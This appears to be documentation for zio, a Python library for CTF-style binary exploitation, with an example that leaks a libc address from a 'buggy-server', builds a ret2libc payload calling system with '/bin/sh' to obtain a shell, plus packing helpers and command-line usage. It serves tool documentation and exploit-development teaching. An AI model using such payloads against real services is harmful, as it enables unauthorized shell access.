```python
from zio import *

if you_are_debugging_local_server_binary:
    io = zio('./buggy-server')      # used for local pwning development
elif you_are_pwning_remote_server:
    io = zio(('1.2.3.4', 1337))     # used to exploit remote service

io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()
```
Official example:
```python
from zio import *

io = zio('./buggy-server')
# io = zio((pwn.server, 1337))

for i in xrange(1337):
    io.writeline('add ' + str(i))
    io.read_until('>>')

io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")

# We've got a shell ;-)
io.interact()
```
The `l` and `b` prefixes stand for little-endian and big-endian. These functions correspond to `p32()`, `p64()` and friends in pwntools.
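To see the convention without zio installed, here is an added, stand-alone reimplementation (not zio's own code) of the `l32`/`l64` and `b32`/`b64` helpers, applied to the leak arithmetic from the official example above; the leaked bytes are a constructed sample, the offsets are the ones the example uses.

```python
import struct

# Added example (not zio's code): each helper packs an int into bytes of the
# given width, or, when handed bytes of that width, unpacks them back to an int.
# 'l' = little-endian, 'b' = big-endian, mirroring pwntools' p32()/u32().

def _pack_or_unpack(value, fmt):
    if isinstance(value, int):
        return struct.pack(fmt, value)
    if len(value) != struct.calcsize(fmt):
        raise ValueError("expected %d bytes" % struct.calcsize(fmt))
    return struct.unpack(fmt, value)[0]

def l32(v):
    return _pack_or_unpack(v, '<I')

def l64(v):
    return _pack_or_unpack(v, '<Q')

def b32(v):
    return _pack_or_unpack(v, '>I')

def b64(v):
    return _pack_or_unpack(v, '>Q')

# Constructed sample: 4 bytes as io.read(4) would return them in the example,
# i.e. the little-endian encoding of 0xf7b79960.
LEAKED_BYTES = b'\x60\x99\xb7\xf7'

def libc_addresses(leak, leaked_offset=0x1a9960,
                   system_offset=0x3ea70, binsh_offset=0x15fcbf):
    """Unpack a leaked libc pointer and derive base/system/"/bin/sh" addresses
    exactly as the example does (offsets taken from the example)."""
    libc_base = l32(leak) - leaked_offset
    return {
        'base': libc_base,
        'system': libc_base + system_offset,
        'binsh': libc_base + binsh_offset,
    }

def build_payload(system, binsh, pad=64):
    """Same layout as the example: padding, packed system, 4-byte filler,
    packed pointer to "/bin/sh"."""
    return b'A' * pad + l32(system) + b'JJJJ' + l32(binsh)
```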
Of course, you can also use it directly from the command line:
```text
$ zio -h
usage:
    $ zio [options] cmdline | host port
options:
    -h, --help              help page, you are reading this now!
    -i, --stdin             tty|pipe, specify tty or pipe stdin, default to tty
    -o, --stdout            tty|pipe, specify tty or pipe stdout, default to tty
    -t, --timeout           integer seconds, specify timeout
    -r, --read              how to print out content read from child process, may be RAW(True), NONE(False), REPR, HEX
    -w, --write             how to print out content written to child process, may be RAW(True), NONE(False), REPR, HEX
    -a, --ahead             message to feed into stdin before interact
    -b, --before            don't do anything before reading those input
    -d, --decode            when in interact mode, this option can be used to specify decode function REPR/HEX to input raw hex bytes
    -l, --delay             write delay, time to wait before write
```